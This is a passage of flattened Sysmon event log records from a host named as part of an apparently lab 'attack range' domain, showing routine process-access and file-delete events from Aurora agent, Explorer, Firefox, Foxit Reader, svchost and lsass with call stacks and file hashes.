Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.718{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.718{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7bfb8|C:\Windows\System32\TwinUI.dll+7559d|C:\Windows\System32\TwinUI.dll+75173|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.716{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002220C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.716{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002220C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.716{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002220C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.709{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=30F7F536C55805E4183507175B94B7EB,SHA256=73F72685EDEC9F942A3D0A6908E290A3492D5C134B0F8D7D0B3F8ADD488612B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.708{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=C3A6781E30B397B9690AC2E180D249B7,SHA256=D72D4D0C58CA80CE0CAE9AC78653E722216CC9B4D29A9B1E338B32E38660B13A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.707{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=2A2BCFEF846B73B81941FA55B0E842A4,SHA256=78CC1D2FBDA774CCB9A0A4E1FABB35A481DC87416893F91A52C66ABADBA3A4D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.706{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\events\newtabMD5=A1E9C8BB6F817BA3028AEE8005BDAD5C,SHA256=8724391A1B7F2F1A941A6666C365D5004B324117670825F7C9EF607E04791C85,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.705{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=2A2BCFEF846B73B81941FA55B0E842A4,SHA256=78CC1D2FBDA774CCB9A0A4E1FABB35A481DC87416893F91A52C66ABADBA3A4D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.702{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e8e1a7|C:\Program Files\Mozilla Firefox\xul.dll+831d2a|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17d2563|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|UNKNOWN(000003DBBB40209C) 10341000x800000000000000044794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.701{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e8e1a7|C:\Program Files\Mozilla Firefox\xul.dll+831d2a|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17d2563|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|UNKNOWN(000003DBBB40209C) 23542300x800000000000000044793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.684{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=58BA190CDF0A07781CC33AD70F74C33D,SHA256=08E6A50F29EFA53CADB2D14BFA8DC582E813FE0E44E3E829900AAC92521A06C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.652{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+b7bc2c|C:\Program Files\Mozilla Firefox\xul.dll+f881b0|C:\Program Files\Mozilla Firefox\xul.dll+f86c65|C:\Program Files\Mozilla Firefox\xul.dll+f821a4|C:\Windows\System32\user32.dll+121e4|C:\Windows\System32\user32.dll+11ed7|C:\Windows\System32\user32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFE2E09B)|UNKNOWN(FFFFF3D9DFE2DFD2)|UNKNOWN(FFFFF3D9DFF12279)|UNKNOWN(FFFFF3D9DFE2FDA8)|UNKNOWN(FFFFF3D9DFE2C7B5)|UNKNOWN(FFFFF3D9DFE15879)|UNKNOWN(FFFFF3D9DFE225B0)|UNKNOWN(FFFFF3D9DFE22189)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+1b84 10341000x800000000000000044791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.652{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.652{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.652{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.652{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.216{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.214{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000044874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.659{FE4C2B44-E52B-63C7-6106-00000000AF02}1144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\88d37fff-6564-4b42-8b15-1d44b80899f3MD5=20DB1311B49F1EB22083F315D6229170,SHA256=8DBCBD8E74393EEC3B3F405F966FAE5ACC444791CE83BDEE6F895FB3FCEBC020,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.549{FE4C2B44-E52B-63C7-6106-00000000AF02}1144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\c5ecaf30-3980-401a-a9bc-0d5c18d84b76MD5=D484F1FE051DF1DA3A6F8914D870C037,SHA256=A968B94990EAD444509F6967A79ADFA82784C1326BD8EBEB974B967C19A21CE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.409{FE4C2B44-E52B-63C7-6106-00000000AF02}1144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\b0eb9103-ffcb-4188-85af-c760aec3080eMD5=F8A833953F912E537C25B18011B3698C,SHA256=726B96A6DDE084C25E31CE69D1F35812EEFDD0BE09BD07C2B5EF40495F066453,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.217{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.214{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DB635C055C6126F787A22042FAC414A,SHA256=1783AA8B5561BC425330BCE4C2B760417AF356DCF877F3B48E78E3B1C6CA1A92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.197{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E52B-63C7-6106-00000000AF02}1144C:\Program Files\Mozilla Firefox\pingsender.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.197{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E52B-63C7-6106-00000000AF02}1144C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.170{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E52B-63C7-6206-00000000AF02}1432C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.170{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E52B-63C7-6206-00000000AF02}1432C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.137{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.137{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 